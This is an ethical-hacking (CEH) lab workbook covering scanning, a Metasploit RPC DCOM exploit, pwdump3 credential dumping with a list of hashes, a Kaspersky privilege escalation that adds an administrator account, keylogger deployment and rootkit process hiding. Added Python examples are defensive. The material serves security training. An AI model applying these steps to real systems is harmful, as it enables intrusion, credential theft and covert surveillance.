7/28/2019 VanLuong.blogspot.com CEH
1/120
C|EH Lab Workbook (student material)
VSIC Education Corporation Page 1
Table of Contents
Lesson 1: FOOTPRINTING (p. 3)
  I/ Introduction to Footprinting (p. 3)
  II/ Lab exercises (p. 3)
    Lab 1: Gathering domain information (p. 3)
    Lab 2: Gathering e-mail addresses (p. 5)
Lesson 2: SCANNING (p. 7)
  I/ Introduction to Scanning (p. 7)
  II/ Lab exercises (p. 7)
    Lab 1: Using Nmap (p. 7)
    Lab 2: Using Retina to find vulnerabilities and attacking with the Metasploit framework (p. 13)
Lesson 3: SYSTEM HACKING (p. 18)
  I/ Introduction to System Hacking (p. 18)
  II/ Lab exercises (p. 18)
    Lab 1: Cracking local passwords (p. 18)
    Lab 2: Using pwdump3v2, with one administrator account on the victim machine, to recover the remaining users' information (p. 20)
    Lab 3: Privilege escalation through the Kaspersky Lab program (p. 23)
    Lab 4: Using a keylogger (p. 25)
    Lab 5: Using a rootkit and clearing log files (p. 27)
Lesson 4: TROJANS AND BACKDOORS (p. 30)
  I/ Introduction to Trojans and Backdoors (p. 30)
  II/ Lab exercises (p. 30)
    Lab 1: Using netcat (p. 30)
    Lab 2: Using the Beast trojan and detecting trojans (p. 32)
      To use the Beast trojan, a server file must be built and installed on the victim machine; that server then listens on fixed ports, and from the attacking machine we connect to the victim through those ports. (p. 32)
    Lab 3: Using a web-based trojan (p. 35)
Lesson 5: SNIFFING METHODS (p. 38)
  I/ Introduction to Sniffers (p. 38)
Lesson 6: Denial of Service (DoS) attacks (p. 65)
  I/ Introduction (p. 65)
  II/ Lab description (p. 67)
    Lab 1: DoS using Ping of Death (p. 67)
    Lab 2: DoS against a protocol without authentication (RIP is used in this lab) (p. 69)
    Lab 3: Using Flash for DDoS (p. 72)
Lesson 7: Social Engineering (p. 74)
  I/ Introduction (p. 74)
  II/ Labs (p. 74)
    Lab 1: Sending an anonymous e-mail with a trojan attached (p. 74)
Lesson 8: Session Hijacking (p. 77)
  I/ Introduction (p. 77)
  II/ Performing the lab (p. 77)
Lesson 9: Hacking Web Servers (p. 80)
  I/ Introduction (p. 80)
  II/ Performing the lab (p. 80)
    Lab 1: Attacking a Win 2003 web server (Apache bug) (p. 80)
    Lab 2: Exploiting a Server U application bug (p. 84)
Lesson 10: WEB APPLICATION HACKING (p. 85)
  I/ Introduction (p. 85)
  II/ Labs (p. 85)
    Lab 1: Cross Site Scripting (p. 85)
    Lab 2: Insufficient Data Validation (p. 86)
    Lab 3: Cookie Manipulation (p. 88)
    Lab 4: Authorization Failure (p. 89)
Lesson 11: SQL INJECTION (p. 91)
  I/ Introduction to SQL Injection (p. 91)
  II/ Lab exercises (p. 94)
Lesson 12: WIRELESS HACKING (p. 101)
  I/ Introduction (p. 101)
  II/ Lab exercises (p. 101)
Lesson 13: VIRUSES (p. 105)
  I/ Introduction (see the supplementary reading) (p. 105)
  II/ Lab exercises (p. 105)
    Lab 1: A virus that destroys data on the machine (p. 105)
    Lab 2: The "gaixinh" virus that spreads through instant messages (p. 107)
Lesson 14: BUFFER OVERFLOW (p. 111)
  I/ Theory (p. 111)
  II/ Lab exercises (p. 118)
Registrar Name....: BlueHost.Com
Registrar Whois...: whois.bluehost.com
Registrar Homepage: http://www.bluehost.com/
Domain Name: ITVIETNAM.COM
Created on..............: 1999-11-23 11:31:30 GMT
Expires on..............: 2009-11-23 00:00:00 GMT
Last modified on........: 2007-07-30 03:15:11 GMT
Registrant Info: (FAST-12836461)
VSIC Education Corporation
VSIC Education Corporation
78-80 Nguyen Trai Street,
5 District, HCM City, 70000
Vietnam
Phone: +84.88363691
Fax..:
Email: [email protected]
Last modified: 2007-03-23 04:12:24 GMT
Administrative Info: (FAST-12836461)
VSIC Education Corporation
VSIC Education Corporation
78-80 Nguyen Trai Street,
5 District, HCM City, 70000
Vietnam
Phone: +84.88363691
Fax..:
Email: [email protected]
Last modified: 2007-03-23 04:12:24 GMT
Technical Info: (FAST-12785240)
Attn: itvietnam.com
C/O BlueHost.Com Domain Privacy
1215 North Research Way Suite #Q 3500
Orem, Utah 84097
United States
Phone: +1.8017659400
Fax..: +1.8017651992
Email: [email protected]
Last modified: 2007-04-05 16:50:56 GMT
Status: Locked
Besides looking up domain information as above, we can use Reverse IP domain lookup utilities to see how many other hosts share the same IP address as ours. Use the following link to access this utility: http://www.domaintools.com/reverse-ip/
Finding this information is very useful to a hacker: based on which sites share the server, the hacker can go through a vulnerable website in that list to attack the server and take control of every website hosted on it.
Lab 2: Gathering e-mail addresses
In this lab we use the program 1st Email Address Spider to search for e-mail addresses. A hacker can use this program to collect more information about mail accounts, or to filter out different groups of addresses; you can also use the tool to collect information for marketing, for example when you need the addresses ending in @vnn.vn or @hcm.vnn.vn to market a product.
We can configure which website the program uses to collect the information; in this lab I use google.com for the search.
Then enter the keyword vnn.vn in the keyword field.
After that we obtain a list of mail addresses produced by this program.
Lesson 2:
SCANNING
I/ Introduction to Scanning:
Scanning, also called network scanning, is an indispensable step in a hacker's attack on a network. If this step is done well, the hacker will quickly find the system's weaknesses, for example the Windows RPC flaw or flaws in web service software such as Apache. From these flaws the hacker can use malicious code (taken from websites) to attack the system and, at a minimum, obtain a shell.
There are many kinds of scanning software: commercial products such as Retina and GFI, and free ones such as Nmap and Nessus. The commercial editions can usually update their vulnerability checks from the Internet and therefore detect newer flaws. Scanning software helps an administrator find the system's weaknesses and at the same time proposes fixes, such as applying service packs or using more sensible policies.
II/ Lab exercises
Lab 1: Using Nmap
Before doing this lab, students should review the theory material on Nmap's options.
We can use the software on the CEH v5 CD, or download the latest version from the website www.insecure.org. Nmap has two builds, one for Windows and one for Linux; in this lab we use the Windows build.
To do this lab, students should use VMware and boot several different operating systems such as Win XP SP2, Win 2003 SP1, Linux Fedora Core, Win 2000 SP4, etc.
First we use Nmap to probe which hosts in the subnet are up and which ports they have open. Run nmap -h to review Nmap's options, then run nmap -sS 10.100.100.1-20, which gives the following result:
C:\Documents and Settings\anhhao>nmap -sS 10.100.100.1-20
Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:27 Pacific Standard Time
Interesting ports on 10.100.100.1:
Not shown: 1695 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
MAC Address: 00:0C:29:09:ED:10 (VMware)
Interesting ports on 10.100.100.6:
Not shown: 1678 closed ports
PORT STATE SERVICE
7/tcp open echo
9/tcp open discard
13/tcp open daytime
17/tcp open qotd
19/tcp open chargen
23/tcp open telnet
42/tcp open nameserver
53/tcp open domain
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1030/tcp open iad1
2105/tcp open eklogin
3389/tcp open ms-term-serv
8080/tcp open http-proxy
MAC Address: 00:0C:29:59:97:A2 (VMware)
Interesting ports on 10.100.100.7:
Not shown: 1693 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
MAC Address: 00:0C:29:95:A9:03 (VMware)
Interesting ports on 10.100.100.11:
Not shown: 1695 filtered ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:A6:2E:31 (VMware)
Skipping SYN Stealth Scan against 10.100.100.13 because Windows does not support
scanning your own machine (localhost) this way.
All 0 scanned ports on 10.100.100.13 are
Interesting ports on 10.100.100.16:
Not shown: 1689 closed ports
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
80/tcp open http135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
MAC Address: 00:0C:29:D6:73:6D (VMware)
Interesting ports on 10.100.100.20:
Not shown: 1693 closed ports
PORT STATE SERVICE
135/tcp open msrpc
445/tcp open microsoft-ds
1000/tcp open cadlock
5101/tcp open admdog
MAC Address: 00:15:C5:65:E3:85 (Dell)
Nmap finished: 20 IP addresses (7 hosts up) scanned in 21.515 seconds
There are 7 hosts in the network in total: 6 VMware machines and 1 Dell PC. The next step is to look up the OS of these hosts using nmap with the -O option followed by the IP address.
C:\Documents and Settings\anhhao>nmap -vv -O 10.100.100.7 (-vv shows the scan in detail)
Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:46 Pacific Standard
Time
Initiating ARP Ping Scan at 10:46
Scanning 10.100.100.7 [1 port]
Completed ARP Ping Scan at 10:46, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:46
Completed Parallel DNS resolution of 1 host. at 10:46, 0.01s elapsed
Initiating SYN Stealth Scan at 10:46
Scanning 10.100.100.7 [1697 ports]
Discovered open port 1025/tcp on 10.100.100.7
Discovered open port 445/tcp on 10.100.100.7
Discovered open port 135/tcp on 10.100.100.7
Discovered open port 139/tcp on 10.100.100.7
Completed SYN Stealth Scan at 10:46, 1.56s elapsed (1697 total ports)
Initiating OS detection (try #1) against 10.100.100.7
Host 10.100.100.7 appears to be up ... good.
Interesting ports on 10.100.100.7:
Not shown: 1693 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
MAC Address: 00:0C:29:95:A9:03 (VMware)
Device type: general purpose
Running: Microsoft Windows 2003
OS details: Microsoft Windows 2003 Server SP1
OS Fingerprint:OS:SCAN(V=4.20%D=8/2%OT=135%CT=1%CU=36092%PV=Y%DS=1%G=Y%M=000C
29%TM=46B2187
OS:3%P=i686-pc-windows-
windows)SEQ(SP=FF%GCD=1%ISR=10A%TI=I%II=I%SS=S%TS=0)
OS:OPS(O1=M5B4NW0NNT00NNS%O2=M5B4NW0NNT00NNS%O3=M5B4NW0NNT0
0%O4=M5B4NW0NNT0
OS:0NNS%O5=M5B4NW0NNT00NNS%O6=M5B4NNT00NNS)WIN(W1=FAF0%W2=F
AF0%W3=FAF0%W4=F
OS:AF0%W5=FAF0%W6=FAF0)ECN(R=Y%DF=N%T=80%W=FAF0%O=M5B4NW0NN
S%CC=N%Q=)T1(R=Y
OS:%DF=N%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=80%W=0%S=Z%A=S%F=AR%O=%RD
OS:=0%Q=)T3(R=Y%DF=N%T=80%W=FAF0%S=O%A=S+%F=AS%O=M5B4NW0NNT
00NNS%RD=0%Q=)T4
OS:(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T
=80%W=0%S=Z%A=S+%
OS:F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=
0%Q=)T7(R=Y%DF=N%
OS:T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%TOS=0
%IPL=B0%UN=0%RIP
OS:L=G%RID=G%RIPCK=G%RUCK=G%RUL=G%RUD=G)IE(R=Y%DFI=S%T=80%T
OSI=Z%CD=Z%SI=S%OS:DLI=S)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IPID Sequence Generation: Incremental
OS detection performed. Please report any incorrect results at http://insecure.o
rg/nmap/submit/ .
Nmap finished: 1 IP address (1 host up) scanned in 3.204 seconds
Raw packets sent: 1767 (78.460KB) | Rcvd: 1714 (79.328KB)
The fingerprints can be viewed in C:\Program Files\Nmap\nmap-os-fingerprints
Continue with the remaining machines.
C:\Documents and Settings\anhhao>nmap -O 10.100.100.1
Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:54 Pacific Standard
Time
Interesting ports on 10.100.100.1:
Not shown: 1695 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
MAC Address: 00:0C:29:09:ED:10 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.12 (x86)
Uptime: 0.056 days (since Thu Aug 02 09:34:08 2007)
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at http://insecure.o
rg/nmap/submit/ .
Nmap finished: 1 IP address (1 host up) scanned in 2.781 seconds
However, there are some hosts that Nmap cannot identify, for example:
C:\Documents and Settings\anhhao>nmap -O 10.100.100.16
Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:55 Pacific Standard
Time
Interesting ports on 10.100.100.16:
Not shown: 1689 closed ports
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
MAC Address: 00:0C:29:D6:73:6D (VMware)
No exact OS matches for host (If you know what OS is running on it, see http://i
nsecure.org/nmap/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=4.20%D=8/2%OT=21%CT=1%CU=35147%PV=Y%DS=1%G=Y%M=000C2
9%TM=46B21A94
OS:%P=i686-pc-windows-
windows)SEQ(SP=FD%GCD=2%ISR=10C%TI=I%II=I%SS=S%TS=0)S
OS:EQ(SP=FD%GCD=1%ISR=10C%TI=I%II=I%SS=S%TS=0)OPS(O1=M5B4NW0NNT0
0NNS%O2=M5B
OS:4NW0NNT00NNS%O3=M5B4NW0NNT00%O4=M5B4NW0NNT00NNS%O5=M5B4
NW0NNT00NNS%O6=M5
OS:B4NNT00NNS)WIN(W1=FAF0%W2=FAF0%W3=FAF0%W4=FAF0%W5=FAF0%W6
=FAF0)ECN(R=Y%DOS:F=Y%T=80%W=FAF0%O=M5B4NW0NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=
O%A=S+%F=AS%RD=0
OS:%Q=)T2(R=Y%DF=N%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%
DF=Y%T=80%W=FAF0
OS:%S=O%A=S+%F=AS%O=M5B4NW0NNT00NNS%RD=0%Q=)T4(R=Y%DF=N%T=8
0%W=0%S=A%A=O%F=
OS:R%O=%RD=0%Q=)T5(R=Y%DF=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0
%Q=)T6(R=Y%DF=N%T
OS:=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=N%T=80%W=0%S=Z
%A=S+%F=AR%O=%RD=
OS:0%Q=)U1(R=Y%DF=N%T=80%TOS=0%IPL=38%UN=0%RIPL=G%RID=G%RIPCK
=G%RUCK=G%RUL=
OS:G%RUD=G)IE(R=Y%DFI=S%T=80%TOSI=S%CD=Z%SI=S%DLI=S)
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at http://insecure.o
rg/nmap/submit/ .
Nmap finished: 1 IP address (1 host up) scanned in 12.485 seconds
Still, we can tell that this is a server running SQL and a web server, so now we use nmap with -p 80 -sV 10.100.100.16 to determine the IIS version.
C:\Documents and Settings\anhhao>nmap -p 80 -sV 10.100.100.16
Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 11:01 Pacific Standard
Time
Interesting ports on 10.100.100.16:
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS webserver 5.0
MAC Address: 00:0C:29:D6:73:6D (VMware)
Service Info: OS: Windows
Service detection performed. Please report any incorrect results at http://insec
ure.org/nmap/submit/ .
Nmap finished: 1 IP address (1 host up) scanned in 6.750 seconds
So we can guess that most of the hosts are Windows 2000 Server. Beyond the exercise above, Nmap can also be used for traceroute, saving logs, and so on.
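The port lists above are exactly what an administrator should be reviewing, since every open port a scanner finds is a service that must be justified. As an added example, not part of the original workbook, the script below parses the "Interesting ports on ..." blocks in the nmap -sS output format shown earlier (the embedded sample is a constructed excerpt of two of the seven hosts) and sorts each open port into a review category: legacy simple services with no business use, clear-text login protocols, and management, database or file-sharing listeners that should be restricted to a management network. The category sets and the messages are assumptions of this example, to be tuned to local policy.

```python
import re

# Constructed excerpt of the "nmap -sS" output printed earlier in this lab
# (two of the seven hosts), embedded so the script runs offline.
SAMPLE_NMAP = """\
Starting Nmap 4.20 ( http://insecure.org ) at 2007-08-02 10:27 Pacific Standard Time
Interesting ports on 10.100.100.6:
Not shown: 1678 closed ports
PORT STATE SERVICE
7/tcp open echo
19/tcp open chargen
23/tcp open telnet
80/tcp open http
445/tcp open microsoft-ds
3389/tcp open ms-term-serv
MAC Address: 00:0C:29:59:97:A2 (VMware)
Interesting ports on 10.100.100.16:
Not shown: 1689 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
1433/tcp open ms-sql-s
MAC Address: 00:0C:29:D6:73:6D (VMware)
Nmap finished: 20 IP addresses (7 hosts up) scanned in 21.515 seconds
"""

HOST_RE = re.compile(r"^Interesting ports on (\S+):")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")

# Review categories; these sets are assumptions of this example.
LEGACY = {"echo", "discard", "daytime", "qotd", "chargen"}  # simple TCP/IP services: no business use, loop/amplification risk
CLEARTEXT = {"telnet", "ftp"}                               # credentials cross the wire unencrypted
RESTRICTED = {"ms-term-serv", "ms-sql-s", "microsoft-ds", "msrpc", "netbios-ssn"}  # management, database, file-sharing listeners


def parse_nmap(text):
    """Map each scanned host to its list of (port, proto, service) open ports."""
    hosts, current = {}, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(1)
            hosts[current] = []
            continue
        m = PORT_RE.match(line)
        if m and current is not None and m.group(3) == "open":
            hosts[current].append((int(m.group(1)), m.group(2), m.group(4)))
    return hosts


def review_exposure(hosts):
    """Return {host: [finding, ...]} for open ports an administrator should justify."""
    findings = {}
    for host, ports in hosts.items():
        issues = []
        for port, proto, svc in ports:
            if svc in LEGACY:
                issues.append(f"{port}/{proto} {svc}: legacy simple service, disable")
            elif svc in CLEARTEXT:
                issues.append(f"{port}/{proto} {svc}: clear-text protocol, replace with SSH/SFTP")
            elif svc in RESTRICTED:
                issues.append(f"{port}/{proto} {svc}: restrict to the management network")
        findings[host] = issues
    return findings


if __name__ == "__main__":
    for host, issues in review_exposure(parse_nmap(SAMPLE_NMAP)).items():
        print(f"{host}: {len(issues)} finding(s)")
        for issue in issues:
            print("   ", issue)
```

Feeding the full scan of the lab subnet through it reproduces the picture the text draws by hand: the Win 2003 SP0 machine at 10.100.100.6 exposes the simple TCP/IP services, telnet and RDP, which is why it tops the Retina report in the next lab.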
Lab 2: Using Retina to find vulnerabilities and attacking with the Metasploit framework.
Retina from eEye is a commercial product (like GFI, Shadow, etc.) that updates its vulnerability checks regularly and helps the system administrator work out remediation. Now we use Retina to scan for flaws on the Win 2003 SP0 machine (10.100.100.6).
Report from the Retina program:
TOP 20 VULNERABILITIES
The following is an overview of the top 20 vulnerabilities on your network.
Rank Vulnerability Name Count
1. echo service 1
2. ASN.1 Vulnerability Could Allow Code Execution 1
3. Windows Cumulative Patch 835732 Remote 1
4. Null Session 1
5. No Remote Registry Access Available 1
6. telnet service 1
7. DCOM Enabled 1
8. Windows RPC Cumulative Patch 828741 Remote 1
9. Windows RPC DCOM interface buffer overflow 1
10. Windows RPC DCOM multiple vulnerabilities 1
11. Apache 1.3.27 0x1A Character Logging DoS 1
12. Apache 1.3.27 HTDigest Command Execution 1
13. Apache mod_alias and mod_rewrite Buffer Overflow 1
14. ApacheBench multiple buffer overflows 1
15. HTTP TRACE method supported 1
TOP 20 OPEN PORTS
The following is an overview of the top 20 open ports on your network.
Rank Port Number Description Count
1. TCP:7 ECHO - Echo 1
2. TCP:9 DISCARD - Discard 1
3. TCP:13 DAYTIME - Daytime 1
4. TCP:17 QOTD - Quote of the Day 1
5. TCP:19 CHARGEN - Character Generator 1
6. TCP:23 TELNET - Telnet 1
7. TCP:42 NAMESERVER / WINS - Host Name Server 1
8. TCP:53 DOMAIN - Domain Name Server 1
9. TCP:80 WWW-HTTP - World Wide Web HTTP (Hyper Text Transfer Protocol) 1
10. TCP:135 RPC-LOCATOR - RPC (Remote Procedure Call) Location Service 1
11. TCP:139 NETBIOS-SSN - NETBIOS Session Service 1
12. TCP:445 MICROSOFT-DS - Microsoft-DS 1
13. TCP:1025 LISTEN - listen 1
14. TCP:1026 NTERM - nterm 1
15. TCP:1030 IAD1 - BBN IAD 1
16. TCP:2103 ZEPHYR-CLT - Zephyr Serv-HM Conncetion 1
17. TCP:2105 EKLOGIN - Kerberos (v4) Encrypted RLogin 1
18. TCP:3389 MS RDP (Remote Desktop Protocol) / Terminal Services 1
19. TCP:8080 Generic - Shared service port 1
20. UDP:7 ECHO - Echo 1
TOP 20 OPERATING SYSTEMS
The following is an overview of the top 20 operating systems on your network.
Rank Operating System Name Count
1. Windows Server 2003 1
We have thus determined the operating system of 10.100.100.6, the system's open ports, and its vulnerabilities. This is the information an administrator needs to recognise and patch flaws. From the top 20 vulnerabilities we will exploit number 10, RPC DCOM, with the Metasploit framework (CEH v5 CD). Details of these flaws can be checked on eEye's own site, or on securityfocus.com and microsoft.com.
We use the Metasploit console interface to find the bug that matches what Retina has just scanned.
We can see the msrpc_dcom_ms03_026.pm module listed in Metasploit's exploit section. Now we start exploiting this flaw.
After the exploit we have a shell on the Win 2003 machine, and can now upload a backdoor or collect the information we need from this machine (this topic is covered in later chapters).
Conclusion: scanning software is very important to a hacker for discovering a system's flaws; once a flaw is identified, the hacker can use a ready-made framework or code available on the Internet to take control of the target machine. However, it is equally a useful tool for the system administrator: it lets the administrator reassess the security level of the system and continuously check for new bugs.
Lesson 3:
SYSTEM HACKING
I/ Introduction to System Hacking:
As we learned in the theory part, the System Hacking module covers techniques for obtaining usernames and passwords, escalating privileges in the system, using a keylogger to collect the opponent's information (at this step the hacker may also plant a trojan, which is covered in the next chapter), hiding running processes (rootkits), and deleting system logs.
For obtaining local usernames and passwords, the hacker can crack passwords on the local machine by installing software on it, or use a Knoppix boot CD to retrieve the syskey; the next step is to decrypt the SAM to obtain the hashes of the system accounts. We can also obtain usernames and passwords remotely via SMB and NTLM (using the sniffing techniques taught in a later chapter) or through an already-known system account (using pwdump3).
For privilege escalation, the hacker can use vulnerabilities in Windows or in software running on the system to obtain Admin rights and control the system. In this lab we exploit a vulnerability in Kaspersky Lab 6.0 to escalate from a normal user to an Administrator user on Win XP SP2.
For the keylogger part we use SC-Keylogger to observe the victim's activity: keyboard input, chat content, machine usage, and the user accounts in use.
Next we use a rootkit to hide the keylogger's processes so the system administrator cannot discover that they are being monitored. At this step we use the Vanquish rootkit to hide processes in the system. Finally we delete logs and traces of the intrusion.
II/ Lab exercises
Lab 1: Cracking local passwords
First we install Cain on the opponent's machine and use it to recover a user's password.
The Add user process
Start Cain and choose Import Hashes from local system.
Here we see three modes. Import Hashes from local system uses the SAM file of the current system to obtain the account hashes (without syskey encryption). Import Hashes from text file normally takes a text file produced by pwdump (which stores the system account hashes unencrypted). The third option is for when we have the syskey and a SAM file encrypted by it. In all three cases, if the information is entered fully, we obtain account hashes that are not encrypted by the syskey. From these hashes the program brute-forces the account's password.
In this lab we choose the user haovsic and select brute force on the NTLM hash. After choosing this mode the PC starts computing and produces the result.
Lab 2: Using pwdump3v2, with one administrator account on the victim machine, to recover the remaining users' information.
The victim machine runs Windows 2003 SP0 and has an existing user quyen with password cisco; using this account we can find information about the other accounts on the machine.
First run pwdump3.exe to see the parameters it expects. Then run pwdump3.exe 10.100.100.6 c:\hao2003sp0 quyen and enter the password of user quyen.
Open the file hao2003sp0 to view the information:
aaa:1015:NO PASSWORD*********************:NO PASSWORD*********************:::
anhhao:1010:DCAF9F8B002C73A0AAD3B435B51404EE:A923FFCC9BE38EBF40A5782BBD9D5E18:::
anhhao1:1011:DCAF9F8B002C73A0AAD3B435B51404EE:A923FFCC9BE38EBF40A5782BBD9D5E18:::
anhhao2:1013:DCAF9F8B002C73A0AAD3B435B51404EE:A923FFCC9BE38EBF40A5782BBD9D5E18:::
anhhaoceh:1019:B26C623F5254C6A311F64391B17C6CDE:98A2C048C77703D54BD0E88887EFD68E:::
ASPNET:1006:7CACBCC121AC203CD8652FE65BEA4486:7D34A6E7504DFAF453D4213660AE7D35:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
hack:1022:CCF9155E3E7DB453AAD3B435B51404EE:3DBDE697D71690A769204BEB12283678:::
hacker:1018:BCE739534EA4E445AAD3B435B51404EE:5E7599F673DF11D5C5C4D950F5BF0157:::
hao123:1020:58F907D1C79C344DAAD3B435B51404EE:FD03071D41308B58B9DDBC6D5576D78D:::
haoceh:1016:B3FF8763A6B5CE26AAD3B435B51404EE:7AD94985F28454259BF2A03821FEC8DB:::
hicehclass:1023:B2BEF1B1582C2DC0AAD3B435B51404EE:D6198C25F8420A93301A5792398CF94C:::
IUSR_113-SSR3JKXGW3N:1003:449913C1CEC65E2A97074C07DBD2969F:9E6A4AF346F1A1F4833ABFA52ADA9462:::
IWAM_113-SSR3JKXGW3N:1004:4431005ABF401D86F92DBAC26FDFD3B8:188AA6E0737F12D16D60F8B64F7AE1FA:::
lylam:1012:EE94DC327C009996AAD3B435B51404EE:7A63FB0793A85C960A775497C9D738EE:::
quyen:500:A00B9194BEDB81FEAAD3B435B51404EE:5C800F13A3CE86ED2540DD4E7331E9A2:::
SUPPORT_388945a0:1001:NO PASSWORD*********************:F791B19C488F4260723561D4F484EA09:::
tam:1014:NO PASSWORD*********************:NO PASSWORD*********************:::
test:1017:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537:::
vic123:1021:CCF9155E3E7DB453AAD3B435B51404EE:3DBDE697D71690A769204BEB12283678:::
We see that user quyen has ID 500, which is the ID of the administrator user in the network, and Guest is 501. Besides that, we now have the users' password hashes, so we use Cain to find the other users' passwords.
Using a brute force attack on user hiclassceh finds the password 1234a. This password has only 5 characters and is brute-forced easily; for strong passwords (a mix of upper and lower case letters, digits and special characters) it takes much longer.
Lab 3: Privilege escalation through the Kaspersky Lab program
To escalate privileges on a system, a hacker must exploit some vulnerability, either in the operating system or in third-party software; in this case we escalate through the anti-virus product Kaspersky Lab. To prepare for this lab, we go to www.milw0rm.com to find information about the exploit code.
We then compile this code into an exe file to attack the victim machine. To do the lab, Kaspersky must be installed on the machine. After installing it we add a normal user to the machine and log on as that user; in this lab we use the user hao with password hao.
Run the compiled exe; it exploits the Kaspersky process, which runs with system privileges. Then use telnet 127.0.0.1 8080 to reach a shell that runs with those privileges. In that shell, run net localgroup administrators hao /add to put user hao in the Administrators group, and net user hao to confirm:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
D:\WINDOWS\system32>
D:\WINDOWS\system32>net Localgroup administrators hao /add
net Localgroup administrators hao /add
The command completed successfully.
D:\WINDOWS\system32>net user hao
net user hao
User name hao
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 8/3/2007 1:47 PM
Password expires 9/15/2007 12:35 PM
Password changeable 8/3/2007 1:47 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 8/3/2007 1:54 PM
Logon hours allowed All
Local Group Memberships *Administrators *Users
Global Group memberships *None
The command completed successfully.
D:\WINDOWS\system32>
User hao now has Administrator rights on the system, so the escalation succeeded. You can test similar programs with code downloaded from www.milw0rm.com.
Lab 4: Using a keylogger

In this lab we use the SC Keylogger software to collect information from the victim's machine. The work consists of building the keylogger file, choosing a mail relay server, and installing it on the victim. After installing the keylogger software, we configure our keylogger: first choose the actions to be logged, namely keyboard input, mouse activity, and programs run.
Next choose the e-mail address to which the victim machine sends the log file. The log is sent every 10 minutes.

Then configure the mail relay server and the process name that will be displayed. For the latter, hackers usually pick names resembling services that already exist on Windows, such as svchost.exe or csrss.exe, to fool the administrator; an extra copy of such a name running from outside the Windows system directory is the thing to look for. For easy identification in this lab we name the file cehkeylogger.

Once the keylogger is built, run it on the victim. We pick a Windows XP machine, run the program there, and suppose the following text is then typed:
After about 10 minutes the log file arrives by e-mail and looks like this:
>> C:\WINDOWS\system32\notepad.exe
> Chuc lopSecCEH manh khoe, va nhieu thanh dat..
> Chuc lop CEH hoc gioi>::::::::::
> ms
>
C:\WINDOWS\system32\mspaint.exe
As seen above, a keylogger can record almost everything done on the victim's PC, in particular sensitive information such as credit card numbers and account credentials. The author urges you to use this knowledge for research only, not to use the program for bad purposes.
Lab 5: Using a rootkit and deleting log files

A rootkit is a program that hides the activity of keyloggers and trojans, making them hard for the system administrator to detect. In this lab we use the FU rootkit to hide the process of the keylogger installed in the previous lab. Use the tasklist command to list the processes running on the computer.
As the figure shows, the cehkeylogger.exe process has PID 1236. Now hide this process with the command fu -ph 1236 and list the processes again with tasklist.
The keylogger has vanished from tasklist. FU hides it by unlinking the process from the kernel's process list that tasklist walks; the process still exists and still answers when its PID is probed directly, which is what rootkit detectors compare against. To detect it reliably at this point, the administrator should use anti-virus software, access control, and rootkit detection programs such as a rootkit detector that performs this kind of comparison.
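Two administrator-side checks for the tricks used in Labs 4 and 5, as an added example that is not part of the original lab: the first catches a process that borrows a Windows service name (svchost.exe, csrss.exe) but runs from the wrong directory; the second is the cross-view test rootkit detectors use, comparing the PIDs tasklist reports with the PIDs that answer a direct probe, so anything in the low-level view but missing from tasklist is hidden. The process lists are constructed (on a live host they would come from tasklist /v or WMI and from an OpenProcess sweep over all PIDs), and the names and directory table are this example's assumptions.

```python
# Added example (not from the original lab): name-masquerade and cross-view checks.
from dataclasses import dataclass
import ntpath   # handles C:\... paths on any platform

SYSTEM32 = r"C:\WINDOWS\system32"
# Service names attackers copy, and the directory the genuine binary lives in on XP (assumed table).
PROTECTED_NAMES = {
    "svchost.exe": SYSTEM32,
    "csrss.exe": SYSTEM32,
    "lsass.exe": SYSTEM32,
    "winlogon.exe": SYSTEM32,
}


@dataclass(frozen=True)
class Proc:
    pid: int
    name: str
    image_path: str
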